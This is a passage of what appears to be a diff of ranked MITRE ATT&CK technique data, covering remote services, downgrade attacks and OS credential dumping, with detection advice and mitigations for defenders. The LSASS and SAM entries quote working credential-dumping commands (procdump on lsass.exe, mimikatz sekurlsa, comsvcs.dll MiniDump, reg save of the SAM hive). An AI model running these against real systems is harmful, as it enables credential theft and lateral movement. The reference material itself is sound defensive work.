Defenses: Downgrade Attack", + "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, PowerShell versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to Impair Defenses while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\nAdversaries may downgrade and use less-secure versions of various features of a system, such as Command and Scripting Interpreters or even network protocols that can be abused to enable Adversary-in-the-Middle.(Citation: Praetorian TLS Downgrade Attack 2014)", + "url": "https://attack.mitre.org/techniques/T1562/010", + "detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 5, + "tid": "T1021", + "name": "Remote Services", + "description": "Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\nLegitimate applications (such as Software Deployment Tools and other administrative programs) may utilize Remote Services to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)", + "url": "https://attack.mitre.org/techniques/T1021", + "detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \nUse of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)", + "score": 2.359182904572381, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "subtechniques": [ + { + "tid": "T1021.001", + "name": "Remote Services: Remote Desktop Protocol", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.(Citation: Alperovitch Malware)", + "url": "https://attack.mitre.org/techniques/T1021/001", + "detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares", + "description": "Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task/Job, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.(Citation: Microsoft Admin Shares)", + "url": "https://attack.mitre.org/techniques/T1021/002", + "detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1021.003", + "name": "Remote Services: Distributed Component Object Model", + "description": "Adversaries may use Valid Accounts to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with Windows Management Instrumentation. (Citation: MSDN WMI)", + "url": "https://attack.mitre.org/techniques/T1021/003", + "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via Query Registry or PowerShell, may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + } + ] + }, + { + "tid": "T1021.004", + "name": "Remote Services: SSH", + "description": "Adversaries may use Valid Accounts to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.", + "url": "https://attack.mitre.org/techniques/T1021/004", + "detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1021.005", + "name": "Remote Services: VNC", + "description": "Adversaries may use Valid Accounts to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\nVNC differs from Remote Desktop Protocol as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", + "url": "https://attack.mitre.org/techniques/T1021/005", + "detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", + "mitigations": [ + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1021.006", + "name": "Remote Services: Windows Remote Management", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with Windows Management Instrumentation.(Citation: MSDN WMI)", + "url": "https://attack.mitre.org/techniques/T1021/006", + "detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 6, + "tid": "T1003", + "name": "OS Credential Dumping", + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.", + "url": "https://attack.mitre.org/techniques/T1003", + "detection": "

Windows

\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.\nHash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well. \nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\nMonitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)\n

Linux

\nTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.", + "score": 2.3380676171838095, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + } + ], + "subtechniques": [ + { + "tid": "T1003.001", + "name": "OS Credential Dumping: LSASS Memory", + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material.\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\nFor example, on the target host use procdump:\n
    \n
  • procdump -ma lsass.exe lsass_dump
    • \n
\nLocally, mimikatz can be run using:\n
    \n
  • sekurlsa::Minidump lsassdump.dmp
    • \n
  • sekurlsa::logonPasswords
    • \n
\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n
    \n
  • rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
    • \n
\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\nThe following SSPs can be used to access credentials:\n
    \n
  • Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
    • \n
  • Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
    • \n
  • Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
    • \n
  • CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
    • \n
", + "url": "https://attack.mitre.org/techniques/T1003/001", + "detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity.\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + } + ] + }, + { + "tid": "T1003.002", + "name": "OS Credential Dumping: Security Account Manager", + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n
    \n
  • reg save HKLM\\sam sam
    • \n
  • reg save HKLM\\system system
    • \n
\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\nNotes: \n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.", + "url": "https://attack.mitre.org/techniques/T1003/002", + "detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1003.003", + "name": "OS Credential Dumping: NTDS", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\nIn addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n
    \n
  • Volume Shadow Copy
    • \n
  • secretsdump.py
    • \n
  • Using the in-built Windows tool, ntdsutil.exe
    • \n
  • Invoke-NinjaCopy
    • \n
", + "url": "https://attack.mitre.org/techniques/T1003/003", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + }, + { + "tid": "T1003.004", + "name": "OS Credential Dumping: LSA Secrets", + "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)\nReg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)", + "url": "https://attack.mitre.org/techniques/T1003/004", + "detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts 